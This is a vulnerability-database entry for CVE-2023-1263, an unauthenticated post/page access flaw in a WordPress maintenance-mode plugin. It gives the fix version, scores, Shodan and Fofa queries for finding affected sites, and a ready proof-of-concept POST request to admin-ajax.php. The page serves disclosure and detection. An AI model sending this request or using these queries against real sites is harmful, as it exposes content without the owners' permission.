🔙 목록으로 돌아가기

CVE-2023-1263: Coming Soon & Maintenance < 4.1.7 - Unauthenticated Post/Page Access

TitleComing Soon & Maintenance < 4.1.7 - Unauthenticated Post/Page Access
Authorr3Y3r53
SeverityMedium
ImpactUnauthenticated attackers can bypass maintenance mode restrictions to access published posts and pages that should be protected during maintenance.
RemediationFixed in version 4.1.7
CVSS Score5.3
EPSS Score0.10375
CVE IDCVE-2023-1263
CWE IDCWE-200
Shodan Queryhttp.html:/wp-content/plugins/cmp-coming-soon-maintenance/
Fofa Querybody=/wp-content/plugins/cmp-coming-soon-maintenance/
Tags cve cve2023 wordpress wpscan wp-plugin wp cmp-coming-soon-maintenance unauth niteothemes vuln

🔍 Vulnerability Description

The plugin does not restrict access to published and non protected posts/pages when the maintenance mode is enabled, allowing unauthenticated users to access them.

🌐 HTTP Request

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.3
Connection: close
Content-Length: 31
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

action=cmp_get_post_detail&id=1

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-1263.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-1263.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A